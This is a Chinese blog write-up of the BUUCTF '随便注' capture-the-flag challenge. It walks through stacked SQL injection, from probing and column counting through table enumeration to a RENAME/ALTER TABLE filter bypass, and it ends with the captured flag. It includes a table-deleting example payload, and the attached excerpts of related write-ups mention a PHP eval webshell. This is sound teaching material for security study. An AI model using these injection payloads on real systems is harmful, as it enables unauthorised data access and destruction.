BUUCTF-Web-随便注-wp

最新推荐文章于 2025-05-13 14:24:35 发布
原创 最新推荐文章于 2025-05-13 14:24:35 发布 · 464 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQL堆叠注入的概念、与联合注入的区别,并通过一个具体的CTF题目案例,演示了如何判断注入类型、查询字段数、显示字段、查询表内字段以及最终获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 知识点

SQL注入-堆叠注入
sql预处理语句
巧用contact()函数绕过

0x02 知识铺垫

在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。

union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。

用户输入:1; DELETE FROM products
服务器端生成的 sql 语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products
当执行查询后,第一条显示查询信息,第二条则将整个表进行删除

0x03 重命名+堆叠注入

打开题目,显示如下界面,根据题目以及界面,判断属于 SQL 注入类问题
在这里插入图片描述

0x04 判断是否存在注入,注入是字符型还是数字型

输入1’发现不回显
输入1’ #显示正常
从而判断存在 SQL 注入
输入1’ or ‘1’='1,正常回显,判断注入类型为字符型注入
在这里插入图片描述

0x05 猜解SQL查询语句中的字段数

输入1’ order by 1 # 成功回显在这里插入图片描述
输入1’ order by 2 # 成功回显在这里插入图片描述
输入1’ order by 3 # 回显错误
[图片上传失败…(image-2ea278-1567002658869)]
所以只有两个字段

0x06 显示字段

输入1′ union select 1,2 # 回显一个正则过滤规则
在这里插入图片描述
这也就意味这页面对 select,update,delete,drop,insert,where 和 . 进行了过滤,根据经验判断是否存在堆叠注入

0x07 堆叠注入测试

输入1’;show databases;#
在这里插入图片描述
根据返回结果可以判断出存在堆叠注入

0x08 查询表

输入1’;show tables;# 成功回显
在这里插入图片描述

0x09 查询表内字段

0x09a 知识铺垫

linux下不区分,windows下区分
区别:
单引号( ’ )或双引号主要用于字符串的引用符号
eg:mysql> SELECT ‘hello’, “hello” ;

反勾号( ` ) 主要用于数据库、表、索引、列和别名用的引用符是[Esc下面的键]
eg:`mysql>SELECT * FROM `table` WHERE `from` = ‘abc’ ;

输入1’; show columns from `words`; # 字段使用的是反勾号( ` )
在这里插入图片描述

输入1’; show columns from `1919810931114514`; # 字段使用的是反勾号( ` )
在这里插入图片描述
查找到 flag 的字段 ,两张表分别是 word 和 1919810931114514,回显内容肯定是从word这张表中回显的,因此需要一种方式让它回显 flag 所在的表。

根据先前获得的信息判断可以使用 alert 和 rename,那么可以尝试、把表进行改名,再给列改个名字。
先把 words 改名为 words1,再把这个数字表改名为 words,然后把新的 words 里的 flag 列改为 id (避免一开始无法查询)。

构造注入语句:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;
ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE
utf8_general_ci NOT NULL;show columns from words;#

在这里插入图片描述

0x10 get flag

输入1’ or ‘1’='1 ,查询就得到 flag
在这里插入图片描述
flag{ebdc096a-e76e-4a76-8c3f-32d8b375e85d}

buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1545
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2608
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF WEB 随便
guishengyx的博客
10-18 240
题目是入,于是尝试SQL入 order by 2得到两个字段 尝试联合查询时发现禁用了select 百度了解到堆叠查询 用;将语句隔开 发现可以使用堆叠入 继续查询表名 查询表中的字段名 0';show columns from words;-- qwe 查询1919810931114514表的时候出现了问题 百度了解到数字表名需要用反引号``括起来 0';show columns from `1919810931114514`;-- asd ...
burpsuite+DVWA实现web暴力破解
最新发布
Wusiyiiii541的博客
05-13 1532
本文详细介绍了burpsuite+DVWA实现web暴力破解的过程
BUUCTF web随便
渗透之路,攻防之间皆学问
11-21 2609
启动靶场访问如下,输入1',报错,可知是字符型入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap入一下,显示存在入,但是始终入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap入不出来,所以先尝试手。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合入。
BUUCTF-web-随便
nareku的博客
07-06 1437
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTFWEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 578
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select 的过滤。发现表都爆出来了,说明存在 SQL 入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
BUUCTF-WEB
ccfly1012的博客
11-02 4146
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3769
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1699
SQL入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
buuctf web 随便
qq_41696858的博客
08-08 504
这题入点很好找,跟之前easy sql一样 先1’直接回显,找到入点 于是常用思路1’ union select 1,2# 把过滤字符都返回出来了 return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 下面就是sql(mysql)知识时间 show语句没有过滤,所以可以开始 -1';show databases; -1';show tables; -1';show columns from `191981093
BUUCTFweb之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTFWeb随便(SQL入)
qq_70434663的博客
03-02 691
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
Buuctf-Web-[强网杯 2019]随便
御七彩虹猫
05-13 310
Buuctf-Web-[强网杯 2019]随便
BUUCTF web 随便
H4ppyD0g的博客
09-19 795
堆叠入 在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两条sql语句。由于两条语句堆叠在同一行,而不是原本应该各自占据一行,所以这种入成为堆叠入。 意1 当数字型字符作为字段、表、库名查询时,应该用反单引号括起来 输入 1 没有报错 1' 报错,证明存在入 1' # 没有报错 1' orde...
BUUCTF Web [强网杯 2019]随便
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
【Writeup】BUUCTF_Web_随便
BAKUMANSEC - Just Do It
08-14 4578
【Writeup】BUUCTF_Web_随便 0x01 解题思路 打开页面,显然考点是SQL入: 手工测试一下: ​ ​ ?inject=' ​ ​ ?inject=' or 1# ​ ​ ?inject=' or 0# 可以进行基于布尔的盲释里有这么一句话: 先用sqlmap常规扫描试试: sqlmap identified the following in...
BUUCTF-Web-随便(堆叠入)
m0_46315342的博客
08-12 436
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
BUUCTF web wp
vegetable223的博客
11-28 468
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
buuctf-snake
03-19
从另一篇wp文档得知存在一段python代码用于计算flag值[^3]: ```python import binascii m = [0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A064A35282B] enc = "********CENSORED********" flag = b"" for i ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值